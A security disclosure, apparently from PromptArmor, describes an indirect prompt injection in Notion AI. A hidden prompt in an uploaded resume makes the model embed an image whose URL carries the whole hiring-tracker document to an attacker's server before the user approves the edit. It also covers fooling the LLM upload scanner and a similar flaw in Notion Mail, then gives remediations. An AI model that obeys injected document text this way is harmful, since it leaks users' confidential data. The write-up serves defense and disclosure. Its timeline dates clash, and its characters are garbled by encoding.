Notion AI Data Exfiltration via Indirect Prompt Injection
A flaw in Notion AIās handling of document edits permits indirect prompt injection that forces the system to prepend malicious images to userāgenerated content. The attack enables an adversary to exfiltrate document data before users consent, exposing sensitive hiringātracker information. Despite a responsible disclosure, Notion dismissed the finding, underscoring the need for stronger safeguards.
Notion AI, which augments documents with naturalālanguageādriven suggestions, suffered a critical vulnerability that allows attackers to exfiltrate client data during the edit process. The flaw is triggered when an untrusted document ā for example a resume PDF ā is uploaded, containing a hidden prompt injection. The injection instructs the language model to construct a URL that concatenates all text from the document and points to an attackerācontrolled domain. When Notion AI inserts an image into the target hiringātracker page using this URL as the source, the userās browser fetches the image before the user is prompted to approve the edit.
Because the HTTP request to the external domain occurs immediately, the attackerās server captures the full URL, which encodes the entire contents of the hiringātracker document. In a test scenario, the payload revealed salary expectations, candidate feedback, role specifications, and diversity hiring goals. Accepting or rejecting the edit afterward does not change the fact that the data has already been transmitted.
The attack works even though Notion AI employs a large language model to scan uploads for malicious content. Since the āsafeādocumentā trigger itself relies on a language model, a carefully crafted prompt injection can convince the scanner that the file is benign. The research purposely did not focus on bypassing this warning, which would have involved placing the injection in a source not subject to scanning, such as a web page, Notion page, or an external connector.
Notion Mailās drafting assistant is similarly vulnerable. By embedding a reference to an untrusted notion page within the draft prompt, the assistant renders insecure Markdown images that pull content from external URLs, again leading to exfiltration via a preāapproval request.
### Recommended Remediations for Organizations
1. **Vet and restrict connectors** that can pull in highly sensitive or untrusted data.
- Settings ā Notion AI ā Connectors
2. **Disable workspaceāwide web search** to prevent automatic fetching from the wider internet.
- Settings ā Notion AI ā AI Web Search ā Enable web search for workspace ā Off
3. **Require confirmation for all external requests**.
- Settings ā Notion AI ā AI Web Search ā Require confirmation for web requests ā On
4. **Avoid including sensitive personal data** in personalization settings.
- Settings ā Notion AI ā Personalization
These measures reduce the exposure surface but do not eliminate the underlying flaw.
### Recommended Remediations for Notion
1. **Disallow automatic rendering of Markdown images** without explicit user approval in both page creation and email drafts.
2. **Implement a robust Content Security Policy (CSP)** that blocks network requests to unapproved external domains.
3. **Ensure CDN infrastructure** cannot be exploited as an open redirect to bypass the CSP.
4. **Introduce a preāapproval audit trail** to detect when edits occur before user confirmation.
### Responsible Disclosure Timeline
- **12/24/2025** ā Initial report submitted via HackerOne.
- **12/24/2025** ā Report acknowledged; modified writeāup requested.
- **12/24/2025** ā PromptArmor provided formatted report.
- **12/29/2025** ā Report closed as nonāapplicable by Notion.
- **01/07/2025** ā Public disclosure released.
The incident underscores the importance of rigorous input validation, userāprompt interaction design, and layered security controls when integrating AI capabilities within collaborative platforms.